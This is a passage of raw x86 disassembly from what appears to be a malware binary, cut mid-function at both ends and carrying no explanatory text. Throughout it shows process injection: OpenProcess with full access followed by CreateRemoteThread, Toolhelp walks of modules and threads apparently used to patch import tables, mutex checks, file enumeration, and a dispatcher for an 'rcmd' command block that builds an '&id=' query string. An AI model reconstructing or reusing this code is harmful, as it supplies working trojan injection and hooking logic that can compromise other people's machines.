pop ebx
loc_417ECA: ; CODE XREF: sub_417DFB+32�j
push 4
push edi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_417F06
cmp [edi], eax
jz short loc_417F06
cmp [ebp+arg_C], 2
jnz short loc_417EE5
mov eax, edi
jmp short loc_417EEF
; ---------------------------------------------------------------------------
loc_417EE5: ; CODE XREF: sub_417DFB+E4�j
mov ecx, [ebp+arg_4]
mov eax, [ecx+10h]
sub eax, [ecx]
add eax, edi
loc_417EEF: ; CODE XREF: sub_417DFB+E8�j
push 4
lea ecx, [ebp+arg_10]
push ecx
push eax
push dword_40FB30
call sub_417CC6
add esp, 10h
jmp short loc_417F08
; ---------------------------------------------------------------------------
loc_417F06: ; CODE XREF: sub_417DFB+1B�j
; sub_417DFB+DA�j ...
xor al, al
loc_417F08: ; CODE XREF: sub_417DFB+109�j
pop edi
leave
retn
sub_417DFB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F0B proc near ; CODE XREF: .data:00415814�p
; .data:00419D58�p
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
cmp [ebp+arg_4], 0
jbe short locret_417F94
push esi
mov esi, [ebp+arg_0]
push ebx
add esi, 8
push edi
loc_417F24: ; CODE XREF: sub_417F0B+84�j
xor edi, edi
cmp [esi], edi
jz short loc_417F91
push 0FFFFFFFFh
lea eax, [ebp+var_38]
push eax
push dword ptr [esi-8]
call sub_41AE95
pop ecx
pop ecx
push eax
call sub_41BC6D
mov [esi+4], eax
mov eax, [esi]
pop ecx
xor ebx, ebx
cmp [eax+8], edi
pop ecx
jz short loc_417F83
loc_417F4E: ; CODE XREF: sub_417F0B+76�j
mov eax, [esi]
mov eax, [edi+eax+4]
test eax, eax
jz short loc_417F74
push 0FFFFFFFFh
lea ecx, [ebp+var_38]
push ecx
push eax
call sub_41AE95
pop ecx
pop ecx
push eax
call sub_41BC6D
pop ecx
pop ecx
mov ecx, [esi]
mov [edi+ecx+10h], eax
loc_417F74: ; CODE XREF: sub_417F0B+4B�j
mov eax, [esi]
inc ebx
mov edi, ebx
imul edi, 14h
cmp dword ptr [edi+eax+8], 0
jnz short loc_417F4E
loc_417F83: ; CODE XREF: sub_417F0B+41�j
inc [ebp+var_4]
mov eax, [ebp+var_4]
add esi, 10h
cmp eax, [ebp+arg_4]
jb short loc_417F24
loc_417F91: ; CODE XREF: sub_417F0B+1D�j
pop edi
pop ebx
pop esi
locret_417F94: ; CODE XREF: sub_417F0B+E�j
leave
retn
sub_417F0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F96 proc near ; CODE XREF: .data:004182C6�p
; sub_41835C+45�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
mov [ebp+var_8], ebx
jbe loc_4180A8
push esi
mov esi, [ebp+arg_4]
add esi, 0Ch
push edi
loc_417FB2: ; CODE XREF: sub_417F96+10A�j
cmp dword ptr [esi-4], 0
jz loc_4180A6
mov eax, [esi]
test eax, eax
jz loc_418094
push eax
mov eax, ebx
jmp loc_418081
; ---------------------------------------------------------------------------
loc_417FCE: ; CODE XREF: sub_417F96+F8�j
mov eax, [esi-4]
xor edi, edi
cmp [eax+8], edi
mov [ebp+var_4], edi
jz loc_41807C
loc_417FDF: ; CODE XREF: sub_417F96+E0�j
push 4
push ebx
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_41802B
cmp [ebx], eax
jz short loc_41802B
mov eax, [esi-4]
cmp dword ptr [eax+edi+10h], 0
jz short loc_418014
add eax, edi
push dword ptr [eax+8]
push 1
push dword ptr [eax+10h]
push ebx
push [ebp+arg_0]
call sub_417DFB
add esp, 14h
test al, al
jnz short loc_418065
loc_418014: ; CODE XREF: sub_417F96+62�j
mov eax, [esi-4]
cmp word ptr [edi+eax], 0
jz short loc_418065
add eax, edi
push dword ptr [eax+8]
movzx eax, word ptr [eax]
push 0
push eax
jmp short loc_418059
; ---------------------------------------------------------------------------
loc_41802B: ; CODE XREF: sub_417F96+54�j
; sub_417F96+58�j
mov eax, [esi-4]
cmp dword ptr [eax+edi+0Ch], 0
jz short loc_418065
lea eax, [ebx+10h]
push 4
push eax
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_418065
cmp [ebx+10h], eax
jz short loc_418065
mov eax, [esi-4]
add eax, edi
push dword ptr [eax+8]
mov eax, [eax+0Ch]
push 2
push dword ptr [eax]
loc_418059: ; CODE XREF: sub_417F96+93�j
push ebx
push [ebp+arg_0]
call sub_417DFB
add esp, 14h
loc_418065: ; CODE XREF: sub_417F96+7C�j
; sub_417F96+86�j ...
inc [ebp+var_4]
mov edi, [ebp+var_4]
mov eax, [esi-4]
imul edi, 14h
cmp dword ptr [eax+edi+8], 0
jnz loc_417FDF
loc_41807C: ; CODE XREF: sub_417F96+43�j
push dword ptr [esi]
lea eax, [ebx+14h]
loc_418081: ; CODE XREF: sub_417F96+33�j
mov edi, [ebp+arg_0]
call sub_417D40
mov ebx, eax
test ebx, ebx
pop ecx
jnz loc_417FCE
loc_418094: ; CODE XREF: sub_417F96+2A�j
inc [ebp+var_8]
mov eax, [ebp+var_8]
add esi, 10h
cmp eax, [ebp+arg_8]
jb loc_417FB2
loc_4180A6: ; CODE XREF: sub_417F96+20�j
pop edi
pop esi
loc_4180A8: ; CODE XREF: sub_417F96+E�j
pop ebx
leave
retn
sub_417F96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4180AB proc near ; CODE XREF: .data:00418250�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_C]
cmp dword ptr [edi+8], 0
jz loc_41814D
mov ebx, edi
loc_4180C5: ; CODE XREF: sub_4180AB+9C�j
mov eax, [ebx+4]
mov esi, [ebp+arg_0]
cmp esi, [eax]
jnz short loc_418137
cmp [ebp+arg_10], 0
jz short loc_4180E2
push [ebp+arg_10]
call sub_41B32E
cmp eax, esi
pop ecx
jz short loc_41814D
loc_4180E2: ; CODE XREF: sub_4180AB+28�j
mov eax, [ebx+8]
xor esi, esi
cmp [eax+8], esi
jz short loc_418137
xor edi, edi
loc_4180EE: ; CODE XREF: sub_4180AB+87�j
cmp [ebp+arg_8], 0
jz short loc_418104
movzx ecx, word ptr [edi+eax]
test cx, cx
jz short loc_418104
cmp cx, [ebp+arg_8]
jz short loc_418154
loc_418104: ; CODE XREF: sub_4180AB+48�j
; sub_4180AB+51�j
cmp [ebp+arg_4], 0
jz short loc_418126
mov eax, [edi+eax+10h]
test eax, eax
jz short loc_418126
push 0FFFFFFFFh
push 0FFFFFFFFh
push [ebp+arg_4]
push eax
call sub_41A493
add esp, 10h
test eax, eax
jz short loc_418154
loc_418126: ; CODE XREF: sub_4180AB+5D�j
; sub_4180AB+65�j
mov eax, [ebx+8]
add edi, 14h
inc esi
cmp dword ptr [edi+eax+8], 0
jnz short loc_4180EE
mov edi, [ebp+arg_C]
loc_418137: ; CODE XREF: sub_4180AB+22�j
; sub_4180AB+3F�j
inc [ebp+var_4]
mov eax, [ebp+var_4]
shl eax, 4
lea ebx, [eax+edi]
cmp dword ptr [ebx+8], 0
jnz loc_4180C5
loc_41814D: ; CODE XREF: sub_4180AB+12�j
; sub_4180AB+35�j
xor eax, eax
loc_41814F: ; CODE XREF: sub_4180AB+BD�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_418154: ; CODE XREF: sub_4180AB+57�j
; sub_4180AB+79�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_C]
shl eax, 4
imul esi, 14h
mov eax, [eax+ecx+8]
mov eax, [eax+esi+8]
jmp short loc_41814F
sub_4180AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41816A proc near ; CODE XREF: .data:00415884�p
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push edi
lea eax, [ebp+var_4]
push eax
push 18h
lea eax, [ebp+var_1C]
push eax
xor edi, edi
push edi
push [ebp+arg_10]
call dword_40FC30
test eax, eax
mov ebx, [ebp+arg_18]
jnz short loc_418209
cmp [ebp+var_18], edi
jz short loc_418209
cmp [ebp+var_C], edi
mov [ebp+var_4], edi
jz short loc_4181E7
push esi
push edi
push 4
call dword_40FE14 ; CreateToolhelp32Snapshot
mov esi, eax
cmp esi, edi
jz short loc_4181E1
lea eax, [ebp+var_38]
push eax
push esi
mov [ebp+var_38], 1Ch
call dword_40FE28 ; Thread32First
jmp short loc_4181D6
; ---------------------------------------------------------------------------
loc_4181C0: ; CODE XREF: sub_41816A+6E�j
mov eax, [ebp+var_2C]
cmp eax, [ebp+var_C]
jnz short loc_4181CB
inc [ebp+var_4]
loc_4181CB: ; CODE XREF: sub_41816A+5C�j
lea eax, [ebp+var_38]
push eax
push esi
call dword_40FE2C ; Thread32Next
loc_4181D6: ; CODE XREF: sub_41816A+54�j
test eax, eax
jnz short loc_4181C0
push esi
call dword_40FDAC ; CloseHandle
loc_4181E1: ; CODE XREF: sub_41816A+40�j
cmp [ebp+var_4], edi
pop esi
jnz short loc_418209
loc_4181E7: ; CODE XREF: sub_41816A+30�j
push 1
push dword_40FCB0
push [ebp+arg_10]
call sub_417B1A
add esp, 0Ch
cmp eax, edi
jz short loc_418209
mov ecx, [ebp+arg_0]
add eax, ecx
mov [ebx+0B0h], eax
loc_418209: ; CODE XREF: sub_41816A+23�j
; sub_41816A+28�j ...
push [ebp+arg_20]
push [ebp+arg_1C]
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call dword_40FC2C
pop edi
pop ebx
leave
retn
sub_41816A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
mov esi, [ebp+14h]
test esi, esi
jz short loc_418241
mov eax, [esi+4]
test eax, eax
jz short loc_418241
cmp word ptr [esi], 0
ja short loc_418243
loc_418241: ; CODE XREF: .data:00418232�j
; .data:00418239�j
xor eax, eax
loc_418243: ; CODE XREF: .data:0041823F�j
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+18h]
push eax
push dword ptr [ebp+10h]
call sub_4180AB
add esp, 14h
test eax, eax
jz short loc_418265
mov ecx, [ebp+1Ch]
mov [ecx], eax
xor eax, eax
jmp short loc_418275
; ---------------------------------------------------------------------------
loc_418265: ; CODE XREF: .data:0041825A�j
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push esi
push dword ptr [ebp+10h]
call dword_40FC40
loc_418275: ; CODE XREF: .data:00418263�j
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+1Ch]
push edi
push esi
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
call dword_40FC3C
push esi
push dword ptr [ebp+18h]
mov ebx, eax
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
call dword_40FC38
mov edi, eax
test edi, edi
jnz short loc_4182D7
test ebx, ebx
jz short loc_4182D7
mov eax, [esi]
cmp word ptr [eax], 5A4Dh
jnz short loc_4182D7
push dword ptr [ebp+8]
call dword_40FE84 ; RtlEnterCriticalSection
push 0FFFFFFFFh
push dword ptr [ebp+0Ch]
push dword ptr [esi]
call sub_417F96
add esp, 0Ch
push dword ptr [ebp+8]
call dword_40FE88 ; RtlLeaveCriticalSection
loc_4182D7: ; CODE XREF: .data:004182A7�j
; .data:004182AB�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4182DE proc near ; CODE XREF: .data:00416AD6�p
; .data:00416AF3�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_8]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_1], 1
jnz short loc_418312
cmp [ebp+arg_4], ebx
mov [ebp+var_1], bl
jz short loc_41830E
push [ebp+arg_4]
push ebx
push 1F0FFFh
call dword_40FE34 ; OpenProcess
mov esi, eax
cmp esi, ebx
jnz short loc_418312
loc_41830E: ; CODE XREF: sub_4182DE+19�j
xor al, al
jmp short loc_418358
; ---------------------------------------------------------------------------
loc_418312: ; CODE XREF: sub_4182DE+11�j
; sub_4182DE+2E�j
push 1
push dword_40FCB0
mov [ebp+arg_4], ebx
push esi
call sub_417B1A
add esp, 0Ch
cmp eax, ebx
jz short loc_418346
lea ecx, [ebp+arg_4]
push ecx
mov ecx, [ebp+arg_0]
push ebx
push ebx
add eax, ecx
push eax
push ebx
push ebx
push esi
call dword_40FDEC ; CreateRemoteThread
push eax
call dword_40FDAC ; CloseHandle
loc_418346: ; CODE XREF: sub_4182DE+4A�j
cmp [ebp+var_1], bl
jnz short loc_418352
push esi
call dword_40FDAC ; CloseHandle
loc_418352: ; CODE XREF: sub_4182DE+6B�j
cmp [ebp+arg_4], ebx
setnz al
loc_418358: ; CODE XREF: sub_4182DE+32�j
pop esi
pop ebx
leave
retn
sub_4182DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41835C proc near ; CODE XREF: .data:0041581C�p
var_428 = dword ptr -428h
var_40C = dword ptr -40Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 428h
push esi
push dword_40FCA4
mov [ebp+var_428], 428h
push 8
call dword_40FE14 ; CreateToolhelp32Snapshot
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4183BB
lea eax, [ebp+var_428]
push eax
push esi
call dword_40FE20 ; Module32FirstW
jmp short loc_4183B7
; ---------------------------------------------------------------------------
loc_418395: ; CODE XREF: sub_41835C+5D�j
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_40C]
call sub_417F96
add esp, 0Ch
lea eax, [ebp+var_428]
push eax
push esi
call dword_40FE24 ; Module32NextW
loc_4183B7: ; CODE XREF: sub_41835C+37�j
test eax, eax
jnz short loc_418395
loc_4183BB: ; CODE XREF: sub_41835C+27�j
pop esi
leave
retn
sub_41835C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4183BE proc near ; CODE XREF: sub_419939+B6�p
var_418 = byte ptr -418h
var_210 = byte ptr -210h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 418h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
lea eax, [ebp+var_210]
push eax
push 1
push [ebp+arg_4]
push edi
call sub_41B2B4
lea eax, [ebp+var_418]
push eax
push 2
push [ebp+arg_4]
push edi
call sub_41B2B4
add esp, 20h
lea eax, [ebp+var_418]
push eax
xor ebx, ebx
push ebx
mov esi, 1F0001h
push esi
call dword_40FD80 ; OpenMutexW
cmp eax, ebx
jz short loc_41841C
loc_41840E: ; CODE XREF: sub_4183BE+6F�j
push eax
call dword_40FDAC ; CloseHandle
xor al, al
loc_418417: ; CODE XREF: sub_4183BE+AD�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41841C: ; CODE XREF: sub_4183BE+4E�j
lea eax, [ebp+var_210]
push eax
push ebx
push esi
call dword_40FD80 ; OpenMutexW
cmp eax, ebx
jnz short loc_41840E
lea eax, [ebp+var_210]
push eax
push 1
push offset dword_40FD24
call dword_40FD7C ; CreateMutexW
mov [ebp+var_8], eax
push edi
mov eax, offset sub_404303
sub eax, dword_40FCB0
push ebx
push eax
call sub_4182DE
add esp, 0Ch
test al, al
jnz short loc_41846D
loc_418460: ; CODE XREF: sub_4183BE+F2�j
push [ebp+var_8]
call dword_40FDAC ; CloseHandle
mov al, bl
jmp short loc_418417
; ---------------------------------------------------------------------------
loc_41846D: ; CODE XREF: sub_4183BE+A0�j
mov [ebp+var_4], ebx
jmp short loc_418496
; ---------------------------------------------------------------------------
loc_418472: ; CODE XREF: sub_4183BE+E5�j
cmp [ebp+var_4], 103h
jnz short loc_4184AE
lea eax, [ebp+var_418]
push eax
push ebx
push esi
call dword_40FD80 ; OpenMutexW
cmp eax, ebx
jnz short loc_4184A7
push 14h
call dword_40FD68 ; Sleep
loc_418496: ; CODE XREF: sub_4183BE+B2�j
lea eax, [ebp+var_4]
push eax
push edi
call dword_40FE30 ; GetExitCodeProcess
test eax, eax
jnz short loc_418472
jmp short loc_4184AE
; ---------------------------------------------------------------------------
loc_4184A7: ; CODE XREF: sub_4183BE+CE�j
push eax
call dword_40FDAC ; CloseHandle
loc_4184AE: ; CODE XREF: sub_4183BE+BB�j
; sub_4183BE+E7�j
mov bl, 1
jmp short loc_418460
sub_4183BE endp
; ---------------------------------------------------------------------------
dw 448Bh
dd 16A0824h, 446830FFh, 0E8004013h, 4446h, 0B00CC483h
dd 14C201h, 824448Bh, 30FF026Ah, 40134468h, 41E8E800h
dd 0C4830000h, 75C0840Ch, 0C2C0FEE7h, 448B0014h, 16A0824h
dd 586830FFh, 0E8004013h, 440Eh, 0B00CC483h, 14C201h, 824448Bh
dd 30FF026Ah, 40135868h, 41B0E800h, 0C4830000h, 75C0840Ch
dd 0C2C0FEE7h
db 14h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
cmp dword ptr [ebp+18h], 0
jnz short loc_41852F
xor al, al
jmp short loc_41854A
; ---------------------------------------------------------------------------
loc_41852F: ; CODE XREF: .data:00418529�j
cmp word ptr [ebp+8], 66h
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
jnz short loc_418543
call sub_41549E
jmp short loc_418548
; ---------------------------------------------------------------------------
loc_418543: ; CODE XREF: .data:0041853A�j
call sub_41555A
loc_418548: ; CODE XREF: .data:00418541�j
pop ecx
pop ecx
loc_41854A: ; CODE XREF: .data:0041852D�j
pop ebp
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+0Ch]
sub esp, 660h
push esi
push 0FFFFFFFFh
push dword ptr [eax]
call sub_41BCB7
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_418573
xor al, al
jmp loc_418602
; ---------------------------------------------------------------------------
loc_418573: ; CODE XREF: .data:0041856A�j
push 103h
lea eax, [ebp-208h]
push eax
push esi
call dword_40FEB4 ; ExpandEnvironmentStringsW
push esi
call sub_41A83D
pop ecx
lea eax, [ebp-458h]
push eax
lea eax, [ebp-208h]
push eax
call dword_40FE94 ; FindFirstFileW
mov esi, eax
test esi, esi
jz short loc_418600
lea eax, [ebp-208h]
push eax
call dword_40FC98
loc_4185B4: ; CODE XREF: .data:004185F7�j
test byte ptr [ebp-458h], 10h
jnz short loc_4185E7
lea eax, [ebp-42Ch]
push eax
lea eax, [ebp-208h]
push eax
lea eax, [ebp-660h]
push eax
call dword_40FC8C
lea eax, [ebp-660h]
push eax
push eax
call sub_41CFA9
pop ecx
pop ecx
loc_4185E7: ; CODE XREF: .data:004185BB�j
lea eax, [ebp-458h]
push eax
push esi
call dword_40FE98 ; FindNextFileW
test eax, eax
jnz short loc_4185B4
push esi
call dword_40FE9C ; FindClose
loc_418600: ; CODE XREF: .data:004185A5�j
mov al, 1
loc_418602: ; CODE XREF: .data:0041856E�j
pop esi
leave
retn 14h
; ---------------------------------------------------------------------------
db 68h
dd 401358h, 3445E8h, 2404C700h, 401344h, 3439E8h, 2404C700h
dd 401300h, 342DE8h, 2404C700h, 401000h, 3421E8h, 1B05900h
dd 330014C2h, 244439C0h, 8B06760Ch, 8B082444h, 2DE85000h
dd 59FFFFC8h, 8B0014C2h, 56082444h, 30FFFF6Ah, 3656E8h
dd 85F08B00h, 745959F6h, 3E83661Bh, 83037500h, 0E850FFC8h
dd 3B20h, 21BFE856h, 59590000h, 2EB01B0h, 0C25EC032h
db 14h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 20Ch
cmp word ptr [ebp+8], 45h
push ebx
push esi
push edi
mov byte ptr [ebp-1], 0
jz short loc_4186D6
cmp word ptr [ebp+8], 46h
jz short loc_4186D6
mov eax, [ebp+0Ch]
push 0FFFFFFFFh
push dword ptr [eax]
call sub_41BCB7
pop ecx
pop ecx
mov esi, eax
push 104h
lea eax, [ebp-20Ch]
push eax
push esi
call dword_40FEB4 ; ExpandEnvironmentStringsW
push esi
mov edi, eax
call sub_41A83D
pop ecx
jmp short loc_418732
; ---------------------------------------------------------------------------
loc_4186D6: ; CODE XREF: .data:0041869F�j
; .data:004186A6�j
lea eax, [ebp-20Ch]
push eax
call sub_41B2FA
pop ecx
lea eax, [ebp-20Ch]
push eax
call dword_40FD90 ; lstrlenW
mov edi, eax
inc edi
xor bl, bl
loc_4186F5: ; CODE XREF: .data:00418730�j
push dword_40FAB8
mov eax, [ebp+0Ch]
push dword ptr [eax]
lea eax, [ebp-20Ch]
push eax
push dword_40FABC
call sub_4172E5
add esp, 10h
neg al
sbb al, al
inc al
mov [ebp-1], al
jz short loc_418732
push 3E8h
call dword_40FD68 ; Sleep
inc bl
cmp bl, 0Ah
jb short loc_4186F5
loc_418732: ; CODE XREF: .data:004186D4�j
; .data:0041871E�j
test edi, edi
jz loc_4187BE
cmp byte ptr [ebp-1], 0
jnz short loc_4187BE
mov eax, [ebp+18h]
add eax, edi
lea eax, [eax+eax+14h]
push eax
call sub_41A81F
mov esi, eax
lea ebx, [edi+edi]
push ebx
lea eax, [ebp-20Ch]
push eax
lea eax, [esi+2]
push eax
mov word ptr [esi], 22h
call sub_41A857
lea eax, [ebx+esi]
xor ebx, ebx
add esp, 10h
cmp [ebp+18h], ebx
mov word ptr [eax], 22h
jz short loc_418798
push dword ptr [ebp+18h]
mov word ptr [eax+2], 20h
lea eax, [esi+edi*2+4]
push eax
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push ebx
push ebx
call dword_40FE60 ; MultiByteToWideChar
loc_418798: ; CODE XREF: .data:0041877A�j
cmp word ptr [ebp+8], 45h
jz short loc_4187AA
cmp word ptr [ebp+8], 47h
jz short loc_4187AA
xor al, al
jmp short loc_4187AD
; ---------------------------------------------------------------------------
loc_4187AA: ; CODE XREF: .data:0041879D�j
; .data:004187A4�j
xor eax, eax
inc eax
loc_4187AD: ; CODE XREF: .data:004187A8�j
push esi
push ebx
push eax
call sub_41C56C
push esi
call sub_41A83D
add esp, 10h
loc_4187BE: ; CODE XREF: .data:00418734�j
; .data:0041873E�j
xor eax, eax
cmp [ebp-1], al
pop edi
pop esi
setz al
pop ebx
leave
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+10h]
and dword ptr [eax], 0
mov eax, [ebp+14h]
and dword ptr [eax], 0
sub esp, 10h
push esi
mov esi, [ebp+8]
mov al, [esi]
mov cl, al
inc cl
test al, al
mov [esi], cl
jbe short loc_4187F3
xor al, al
jmp short loc_418856
; ---------------------------------------------------------------------------
loc_4187F3: ; CODE XREF: .data:004187ED�j
push edi
push 2
push offset a3 ; "3="
push dword ptr [ebp+0Ch]
mov byte ptr [esi+8], 1
call sub_41A875
add esp, 0Ch
push dword_40FB2C
mov edi, eax
call dword_40FD94 ; lstrlenA
push eax
push dword_40FB2C
push edi
call sub_41A875
push 4
push offset aId ; "&id="
push eax
call sub_41A875
mov edi, eax
push 0Ah
lea eax, [ebp-10h]
push eax
push dword ptr [esi+4]
call sub_41A44B
push eax
lea eax, [ebp-10h]
push eax
push edi
call sub_41A875
add esp, 30h
mov byte ptr [eax], 0
mov al, 1
pop edi
loc_418856: ; CODE XREF: .data:004187F1�j
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 4
lea eax, [ebp-38h]
push offset aRcmd ; "rcmd"
xor bl, bl
push eax
mov [ebp-2], bl
call sub_41A857
mov esi, [ebp+8]
push 4
lea eax, [ebp-34h]
push esi
push eax
call sub_41A857
lea eax, [ebp-38h]
push 8
push eax
push eax
call sub_41B6F9
lea eax, [ebp-38h]
push 0
push eax
call sub_41B99C
add esp, 2Ch
test eax, eax
jnz loc_418A00
mov eax, [esi+4]
mov edi, [esi+8]
add edi, eax
cmp eax, edi
mov [ebp-1Ch], edi
jnb loc_418A00
loc_4188BD: ; CODE XREF: .data:004189F6�j
test bl, bl
jnz loc_418A53
cmp byte ptr [eax], 0Ah
mov ecx, eax
jmp short loc_4188D4
; ---------------------------------------------------------------------------
loc_4188CC: ; CODE XREF: .data:004188D7�j
cmp ecx, edi
jnb short loc_4188D9
inc ecx
cmp byte ptr [ecx], 0Ah
loc_4188D4: ; CODE XREF: .data:004188CA�j
mov [ebp-0Ch], ecx
jnz short loc_4188CC
loc_4188D9: ; CODE XREF: .data:004188CE�j
lea edx, [ebp-8]
push edx
lea edx, [ebp-14h]
push edx
push ecx
push eax
call sub_41A5B6
add esp, 10h
test al, al
jz loc_4189ED
mov eax, [ebp-8]
inc eax
mov [ebp-8], eax
sub eax, [ebp-14h]
mov byte ptr [ebp-1], 0
mov esi, eax
loc_418903: ; CODE XREF: .data:00418931�j
movzx eax, byte ptr [ebp-1]
movzx eax, word_40F330[eax*8]
mov ecx, dword_40FB34
push 0FFFFFFFFh
push esi
push dword ptr [ecx+eax*4]
push dword ptr [ebp-14h]
call sub_41A493
add esp, 10h
test eax, eax
jz short loc_418938
inc byte ptr [ebp-1]
cmp byte ptr [ebp-1], 12h
jb short loc_418903
jmp loc_4189ED
; ---------------------------------------------------------------------------
loc_418938: ; CODE XREF: .data:00418928�j
movzx esi, byte ptr [ebp-1]
shl esi, 3
movzx eax, word_40F330[esi]
cmp ax, 3Eh
jnz short loc_418955
mov byte ptr [ebp-2], 1
jmp loc_4189ED
; ---------------------------------------------------------------------------
loc_418955: ; CODE XREF: .data:0041894A�j
cmp ax, 44h
jnz short loc_418964
mov byte ptr [ebp-2], 2
jmp loc_4189ED
; ---------------------------------------------------------------------------
loc_418964: ; CODE XREF: .data:00418959�j
cmp ax, 3Ah
jnz short loc_418970
mov byte ptr [ebp-2], 3
jmp short loc_4189ED
; ---------------------------------------------------------------------------
loc_418970: ; CODE XREF: .data:00418968�j
cmp ax, 3Bh
jnz short loc_41897C
mov byte ptr [ebp-2], 4
jmp short loc_4189ED
; ---------------------------------------------------------------------------
loc_41897C: ; CODE XREF: .data:00418974�j
mov al, byte_40F333[esi]
mov ecx, [ebp-8]
xor edi, edi
test al, al
mov [ebp-18h], ecx
mov [ebp-10h], edi
jbe short loc_4189AB
movzx eax, al
push eax
lea eax, [ebp-18h]
push eax
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-0Ch]
push ecx
call sub_41C757
add esp, 14h
mov edi, eax
loc_4189AB: ; CODE XREF: .data:0041898F�j
movzx eax, byte_40F332[esi]
cmp edi, eax
jnb short loc_4189BA
mov bl, 1
jmp short loc_4189DF
; ---------------------------------------------------------------------------
loc_4189BA: ; CODE XREF: .data:004189B4�j
mov eax, [ebp-0Ch]
sub eax, [ebp-8]
inc eax
push eax
push dword ptr [ebp-18h]
movzx eax, word_40F330[esi]
push edi
push dword ptr [ebp-10h]
push eax
call off_40F334[esi]
mov bl, al
neg bl
sbb bl, bl
inc bl
loc_4189DF: ; CODE XREF: .data:004189B8�j
push edi
push dword ptr [ebp-10h]
call sub_41A8D2
mov edi, [ebp-1Ch]
pop ecx
pop ecx
loc_4189ED: ; CODE XREF: .data:004188ED�j
; .data:00418933�j ...
mov eax, [ebp-0Ch]
mov esi, [ebp+8]
inc eax
cmp eax, edi
jb loc_4188BD
test bl, bl
jnz short loc_418A53
loc_418A00: ; CODE XREF: .data:004188A4�j
; .data:004188B7�j
push 4
lea eax, [ebp-38h]
push esi
push eax
call sub_41B9E9
add esp, 0Ch
xor bl, bl
loc_418A11: ; CODE XREF: .data:00418A51�j
mov eax, [esi]
mov [ebp-24h], eax
lea eax, [ebp-28h]
push eax
push 0
push offset sub_4072A7
push dword_40FABC
mov byte ptr [ebp-28h], 0
mov byte ptr [ebp-20h], 0
call sub_4178FE
add esp, 10h
test al, al
jz short loc_418A41
cmp byte ptr [ebp-20h], 0
jnz short loc_418A53
loc_418A41: ; CODE XREF: .data:00418A39�j
push 3E8h
call dword_40FD68 ; Sleep
inc bl
cmp bl, 0Ah
jb short loc_418A11
loc_418A53: ; CODE XREF: .data:004188BF�j
; .data:004189FE�j ...
mov al, [ebp-2]
cmp al, 1
jz short loc_418A79
cmp al, 2
jnz short loc_418A65
call sub_41B5F2
jmp short loc_418A79
; ---------------------------------------------------------------------------
loc_418A65: ; CODE XREF: .data:00418A5C�j
cmp al, 3
jnz short loc_418A6D
push 1
jmp short loc_418A73
; ---------------------------------------------------------------------------
loc_418A6D: ; CODE XREF: .data:00418A67�j
